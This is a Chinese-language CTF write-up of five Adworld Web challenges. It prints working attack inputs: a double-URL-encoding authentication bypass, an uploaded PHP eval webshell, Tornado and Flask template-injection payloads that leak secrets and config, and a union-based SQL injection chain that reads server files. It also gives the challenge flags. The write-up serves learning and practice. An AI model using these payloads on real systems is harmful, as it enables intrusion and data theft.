攻防世界 - Web(三)
PHP2:
1.进入页面,进行抓包或后台扫描都没有什么发现,然后网上查一波wp,发现是关于.phps文件,进入index.phps,弹出一段代码,查看源代码,
<?php
if("admin"===$_GET[id]) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
}
?>
Can you anthenticate to this website?
2.分析源码发现,需要绕过,
"admin"===$_GET[id]
3.源码中还会进行一次urldecode,同时浏览器也会自动url解码一次,(先进行url编码,在进行代码内部的urldecode编码),
$_GET[id] = urldecode($_GET[id]);
4.对admin部分或者整个字符串进行两次url编码,
urldecode(%2561)=%61
urldecode(%61)=a
5.得到flag,
flag:
cyberpeace{a66b41e93a4251c196c8e734a663f422}
补充:
字符的url编码:
字符的十六进制前面加了个百分号
.PHPS:
PHPS文件类型主要与PHP Group的“ PHP Source”相关联。 通常,PHP文件将由Web服务器和PHP可执行文件解释,并且您永远不会看到PHP文件后面的代码。
如果将文件扩展名设置为.PHPS,则正确配置的服务器将输出源的彩色格式版本,而不是通常会生成的HTML。
参考:
https://blog.csdn.net/Claming_D/article/details/107698499
https://www.cnblogs.com/gaonuoqi/p/11373632.html
upload1:
1.进入页面,人以上传一个php文件,发现要求上传一张图片,进行抓包,发现是前端检测文件类型,因此查看源代码,将check()函数删除,
2.上传aaa.php文件,并写入一句话木马,上传成功,
<?php
@eval($_REQUEST['aaa']);
?>
3.进行检验,
4.用蚁剑连接,发现在html目录下有flag.php,进入即可得到flag,
flag:
cyberpeace{ea8e46f9161212e0a9983fd3794ac7a2}
easytornado:
1.进入页面,发现三个链接,点进去分别是,
/flag.txt:
内容:
/flag.txt
flag in /fllllllllllllag
/welcome.txt:
内容:
/welcome.txt
render
/hints.txt:
内容;
/hints.txt
md5(cookie_secret+md5(filename))
2.尝试进入/fllllllllllllag目录,回显为404,
3.然后没思路了,网上找带佬儿的wp:/welcome.txt页面看到render,可能会是SSTI模板注入
4.传递msg={{999}},出现如下回显,
5.当传入msg={{2*3}},出现如下回显,尝试除和减操作符也是返回ORZ,说明是操作符被过滤了,
6.通过模板注入如何拿到tornado中的cookie,用的就是handler.settings对象,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所有handler.settings就指向RequestHandler.application.settings了。
传递error?msg={{ handler.settings }}得到:
7.使用md5加密构造计算出filehash的值,md5(cookie_secret+md5(/fllllllllllllag)),
其中,cookie_secret为df7c68e3-32f2-47e3-b5c2-370bff4bd799,
md5(/fllllllllllllag)为3bf9f6cf685a6dd8defadabfb41a03a1,
md5(cookie_secret+md5(/fllllllllllllag))为e506787701926864f020c1bf83a57d29
(要用32位[小])
8.得到flag,
flag:
flag{3f39aea39db345769397ae895edb9c70}
参考:
https://www.cnblogs.com/joker-vip/p/12511948.html
https://blog.csdn.net/zz_Caleb/article/details/96480967
shrine:
(!!!)
1.进入页面,是一段代码,
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
2.出现flask,考虑STTI模板注入,@app.route后跟着路径,还有blacklist过滤,进行测试,发现存在注入,
http://220.249.52.133:44363/shrine/{{2*10}}
3.config和self加入了黑名单以及过滤了括号,
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
4.我们输入的值首先被传到了safe_jinja()函数,然后由flask.render_template_string进行渲染,传入的( )都会被置换为空,
5.构造payload,获取全局变量的config,
{{url_for.__globals__['current_app'].config}}
6.得到flag,
flag:
flag{shrine_is_good_ssti}
参考:
https://blog.csdn.net/gongjingege/article/details/107711286
fakebook:
1.进入页面,点击join创建新用户后,
2.进入用户,观察url,利用以下语句判断可能存在GET注入,同时会发现会发现/var/www/html/view.php 路径,
no=4
no=4'
no=4 and 1=1
no=4 and 1=2
3.利用order by可以判断字段为4,
4.构造union select语句发现被过滤了,
5.用/**/注释符绕过,
no=-4 union/**/select 1,2,3,4#
6.根据回显2,进行数据库查询,
no=-4 union/**/select 1,database(),3,4--+
7.同时从unserialize()函数可以看出,数据保存时序列化,输出反序列化,显示在博客界面。
8.查库名,
no=-4 union/**/select 1,group_concat(schema_name) ,3,4 from information_schema.schemata#
库名为:
fakebook,information_schema,mysql,performance_schema,test
9.查表名,
no=-4 union/**/select 1,group_concat(table_name) ,3,4 from information_schema.tables where table_schema="fakebook"#
表名:
users
10.查字段,
no=-4 union/**/select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema="fakebook"#
字段:
no,username,passwd,data
11.查字段信息,发现被反序列化,
no=-4 union/**/select 1,group_concat(data),3,4 from fakebook.users #
12.利用抓包,得到flag,
no=-4 union/**/select 1,load_file("/var/www/html/flag.php"),3,4
flag:
flag{c1e552fdf77049fabf65168f22f7aeab}
参考:
https://blog.csdn.net/gongjingege/article/details/107784880
https://blog.csdn.net/qq_41500251/article/details/105383065